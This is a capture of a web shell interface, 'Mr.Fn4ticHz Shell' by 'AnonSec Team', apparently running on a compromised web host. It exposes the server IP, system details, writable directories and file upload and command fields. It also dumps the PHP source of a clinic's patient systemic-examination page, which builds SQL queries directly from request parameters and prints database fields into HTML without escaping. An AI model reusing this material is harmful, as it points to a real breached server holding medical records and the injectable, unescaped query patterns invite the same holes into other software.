Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.138.121.151
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//showpage_Systemic_Examination.php
     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>



<h3 align='center'>Systemic Examination</h3>
<?php
include("dbconnection.php");
	$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Intial Assessment<br>Covid 19 Checklist<br>Doc.no-'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Intial Assessment<br>Covid 19 Checklist<br>Doc.no-'){
	        echo"<h4>Doc.no : $rsp[srno]</h4>";

} else{
    echo "";
}
       
	}
		$sql2 ="SELECT * FROM surgerytracker WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND  surgeryid='$_GET[surgeryid]'";
		$qsql2 = mysqli_query($con,$sql2);
		while($rs2 = mysqli_fetch_array($qsql2))
		{

		    echo '<h4>Surgery Id :-'.$rs2[surgeryid].' / ';
		    
		    $sql1 ="SELECT * FROM list_tretment WHERE trid='$rs2[surgery]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re1 = mysqli_fetch_array($qsql1))
		{
		    echo $re1[tratment] .'</h4>';
		}
		}
?> 
 <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>

   <div class='center'>  <?php
//   	$sql ="SELECT * FROM Systemic_Examination WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
// 		$qsql = mysqli_query($con,$sql);
// 		if($rs = mysqli_fetch_array($qsql))
// 		{
// 		    echo"
// 		    <h3 align='right'><a href='edit_showpage_Systemic_Examination.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]'>Edit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3>";
// 		}
		?><br>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Systemic_Examination WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND  surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 
<table id='example2' class='table table-bordered table-hover' border='1' width='100%'>
        
        <th></th>
            <th>Action</th>
        <th>Note</th>
        <tr>
            <td width='20%'>HISTORY OF  Any Systemic Disease</td>
             <td width='20%'>$rs[Systemic_Disease]</td>
             <td width='60%'>$rs[Systemic_Disease_note]</td>
        </tr>
         <tr>
            <td width='20%'>HISTORY OF  Anesthesia Events</td>
             <td width='20%'>$rs[Anesthesia_Events]</td>
             <td width='60%'>$rs[Anesthesia_Events_note]</td>
        </tr>
   <tr>
            <td width='20%'>HISTORY OF  Operations/SURGERY
</td>
             <td width='20%'>$rs[ho_Operations]</td>
             <td width='60%'>$rs[ho_Operations_note]</td>
        </tr>  
  <tr>
      <tr>
            <td width='20%'>HISTORY OF  Adverse Drugs Reaction
</td>
             <td width='20%'>$rs[Adverse_Drugs_Reaction]</td>
             <td width='60%'>$rs[Adverse_Drugs_Reaction_note]</td>
        </tr>  
  <tr>
            <td width='20%'>HISTORY OF  DRUG THERAPY

</td>
             <td width='20%'>$rs[DRUG_THERAPY]</td>
             <td width='60%'>$rs[DRUG_THERAPY_note]</td>
        </tr>  

        </table>
        
        
        <table id='example2' class='table table-bordered table-hover'> 
  <div class='center'>
      <h5 align='center'>SYSTEMIC EXAMINATION </h5>
        <h6>CARDIAO VASCULAR SYSTEM: RESPIRATORY SYSTEM: </h6>
      <tr><td><span style='font-size: 20px'>HISTORY OF CHEST PAIN 
</span></h3></td><td>";
if($rs[HISTORY_CHEST_PAIN] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"</td>";
echo"
<td><span style='font-size: 20px'>HISTORY OF PALPITATION </span></h3></td><td>";
if($rs[HISTORY_PALPITATION] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
  echo"
</td> </tr>";
echo"<tr>
<td><span style='font-size: 20px'>HISTORY OF HYPERTENTION 
</span></h3></td><td>";
if($rs[HISTORY_HYPERTENTION] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
<td><span style='font-size: 20px'>S1 &S2 </span></h3></td><td>$rs[S1_S2]
</td>
</tr>
<tr>
<td><span style='font-size: 20px'>MURMUR </span></h3></td><td>$rs[MURMUR]
</td>
<td><span style='font-size: 20px'>ECG REPORT</span></h3></td><td>$rs[ECG_REPORT]
</td>
</tr>
<tr>
<td><span style='font-size: 20px'>B/L  AIR ENTER IN LUNGS </span></h3></td><td>";
if($rs[ENTER_LUNGS] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>CREPITATIONS / WHEEZ 
</span></h3></td><td>";
if($rs[CREPITATIONS_WHEEZ] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr> 
<tr>
<td><span style='font-size: 20px'>HISTORY OF COUGH / BRONCHISOSM  </span></h3></td><td>";
if($rs[HISTORY_COUGH] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF BRONCHIAL ANTHMA 
</span></h3></td><td>";
if($rs[HISTORY_BRONCHIAL] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr> 
<tr>
<td><span style='font-size: 20px'>HISTORY OF REPAIRATORY DISEASES </span></h3></td><td>";


if($rs[HISTORY_REPAIRATORY] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
<td><span style='font-size: 20px'>PULMONARY FUNCTION TEST 
</span></td><td>$rs[PULMONARY_TEST]
</td>
</tr>       
          </div>      
          
          
</table>

<table id='example2' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>CENTRAL NERVOUS SYSTEM            </span> </td></tr></p>
      </table>
        <table id='example2' class='table table-bordered table-hover'> 
      <tr><td><span style='font-size: 20px'>HISTORY OF CONVULSION / FITS 
</span></h3></td><td>";

if($rs[HISTORY_CONVULSION] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF TREMOR </span></h3></td><td>";
if($rs[HISTORY_TREMOR] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr>  

<tr><td><span style='font-size: 20px'>HISTORY OF  GI BLEEDING 
</span></h3></td><td>";

if($rs[HISTORY_GI_BLEEDING] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF ANY NEUROLOGICAL DISEASE </span></h3></td><td>";


if($rs[NEUROLOGICAL_DISEASE] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
</tr>  
</table>
<table id='example2' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>GASTRO INTESTINAL SYSTEM           </span> </td></tr></p>
      </table>
        <table id='example2' class='table table-bordered table-hover'> 
<tr><td><span style='font-size: 20px'>H/O/ACIDITY / HEART BURN
</span></h3></td><td>";
if($rs[HEART_BURN] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}

echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF ANY OTHER DISEASE 
</span></h3></td><td>";
if($rs[OTHER_DISEASE] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr> 
    <tr>
<td><span style='font-size: 20px'>LIVER FUNCTION TEST  </span></h3></td><td>$rs[LIVER_FUNCTION_TEST]
</td>

</tr>   
</table>
<table id='example2' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>   ENDOCRINE SYSTEM </span> </td></tr></p>
      </table>
  <table id='example2' class='table table-bordered table-hover'> 
      <tr><td><span style='font-size: 20px'>HISTORY OF  DM 
</span></h3></td><td>";
if($rs[HISTORY_DM] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF HYPER / HYPO THYROIDISM 
</span></h3></td><td>";
if($rs[HISTORY_HYPER] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr>
<tr><td><span style='font-size: 20px'>HISTORY OF ANY OTHER HARMONAL ABNORMALITY 
</span></h3></td><td>";


if($rs[HARMONAL_ABNORMALITY] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
</tr>
</table>
<table id='example2' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>   GENITO URINARY SYSTEM </span> </td></tr></p>
      </table>
  <table id='example2' class='table table-bordered table-hover'> 
  <tr><td><span style='font-size: 20px'>HISTORY OF HAEMATURIA</span></h3></td><td>";
  if($rs[HISTORY_HAEMATURIA] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
  echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF UTI  </span></h3></td><td>";
 if($rs[HISTORY_UTI] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}

echo"
</td>
</tr>  
<tr>
<td><span style='font-size: 20px'>HISTORY OF STD 
</span></h3></td><td>";
 if($rs[HISTORY_STD] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}

echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF RENAL PROBLEM 
</span></h3></td><td>";

if($rs[RENAL_PROBLEM] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
</tr>


";
}
?>

				</table>
</div>

<?php

  	$sql11 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]' ";
		$qsql11 = mysqli_query($con,$sql11);
		while($rs11 = mysqli_fetch_array($qsql11))
		{
			$sql ="SELECT * FROM Systemic_Examination WHERE prescriptionid='$rs11[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{  
	    $sql1 ="SELECT * FROM site_users WHERE userno='$rs[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($rs1 = mysqli_fetch_array($qsql1))
		{
		    
		 echo"<h5><b> Created & Updated </b><h5>
		 <table id='example2' class='table table-bordered table-hover'>
		 <tr><td width=50%><b>By :</b>$rs1[name] </b><td width='50%'><b>At :</b> $rs11[created_at] </tr>";   
		    
		}
		}
	}
		?>
		</table>

Anon7 - 2022
AnonSec Team